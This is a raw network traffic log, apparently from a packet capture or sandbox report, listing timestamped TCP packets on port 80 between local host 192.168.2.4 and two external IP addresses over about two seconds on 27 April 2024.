Apr 27, 2024 02:19:32.719707012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.732947111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.733114004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.735966921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.736023903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.736036062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.736093044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.736093044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.736148119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.736150980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.736202002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.737054110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.737107038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.737179041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.737231016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.737319946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.737334013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.737374067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.737404108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.841703892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.841763020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.841814041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.883519888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.883619070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.883758068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.906047106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.906099081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.908449888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.908504009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.908504009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.908546925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.908576012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.908618927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.908931017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.908979893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.909029007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.909070969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.909332991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.909379959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.909442902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.909487963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.909527063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.909570932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.909627914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.909689903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.915256977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.915313959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.915359974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.915426016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.965188980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.037137985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.037159920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.037235975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.078134060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.078218937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.080210924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.080259085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.080461979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.080513000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.080521107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.080560923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.080727100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.080775023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.080796003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.080841064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.081449032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.081511974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.081541061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.081587076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.081614017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.081659079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.081717014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.081759930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.081768990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.081845045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.081887007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.110553980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.110572100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.110651016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.160932064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.215290070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.232420921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.232511044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.232564926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.249712944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.249772072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.249778986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.249835014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.251354933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.251408100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.251517057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.251565933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.251590967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.251635075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.251723051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.251770973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.251804113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.252163887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.252530098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.252582073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.252666950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.252715111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.252743959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.252794981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.252903938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.252958059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.277090073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.277168989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.277219057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.307378054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.307393074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.307465076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.422430992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.422512054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.423609972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.423666000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.423711061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.423759937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.425738096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.425802946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426161051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426218987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426256895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426314116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426318884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426357985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426407099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426455975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426472902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426510096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426547050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426592112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.426578045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426698923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.426701069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.426713943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.426821947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.441324949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.441441059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.441530943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.472670078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.472707033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.472760916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.511574984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.511605978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.511671066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.594974995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.595036983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.596234083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.596282959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.598664999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.598706007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.598721027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.598754883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599258900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599313974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599364042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599426985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599427938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599488020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599500895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599539042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599615097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599678993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599680901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599745989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.599749088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.599797964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.623215914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.623281002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.623332977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.637912989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.637928009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.637979984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.668847084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.668878078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.668930054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.766158104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.766237020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.771775961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.771841049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777189016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777209997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777245998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777282000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777287006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777339935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777374029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777391911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777446985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777446985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777468920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777514935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777652025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777699947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777707100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777756929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.777760983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.777822018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.819210052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.819369078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.819387913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.819406986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.819442034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.819464922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.819495916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.833478928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.833538055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.833591938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.867789984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.867922068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.868047953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:33.918318033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:33.937535048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.937597990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.943833113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.943887949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950092077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950193882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950234890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950287104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950403929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950453997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950503111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950553894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950601101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950644970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950735092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950782061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950804949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950854063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:33.950886965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:33.950932980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.015542030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.015564919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.015609980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.015664101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.015777111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.015819073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.029078007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.029448986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.029494047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.064642906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.064687967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.064749002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.109464884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.109532118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.114847898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.115219116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.115274906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.122127056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.122193098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.122230053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.122298002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.122349024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.122400999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.122730970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.122747898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.122802973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.122802973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.211661100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.211687088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.211704969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.211766005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.211775064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.211813927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.211833000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.211879969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.225028038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.225116014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.225173950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.260092020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.260184050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.260251999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.280555964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.280637980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.286160946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.286252975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.293590069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.293667078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.293669939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.293685913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.293720961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.293751001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.294091940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.294142962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.294177055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.294233084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.407500029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407521963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407663107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407680035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407696009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407706022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407748938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.407804966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.407847881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.420681000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.420701027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.420876980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.451622009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.451690912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.451868057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.451903105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.455197096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.455259085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.455338955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.458043098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.458098888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.465787888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.465832949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.465842009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.465851068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.465867043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.465874910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.465897083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.465919018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.465989113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.466034889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.512180090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.602219105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602302074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602410078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602495909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.602701902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602720022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602771997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.602940083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.616215944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.616460085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.616480112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.616674900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.623008966 CEST	80	49733	185.172.128.76	192.168.2.4
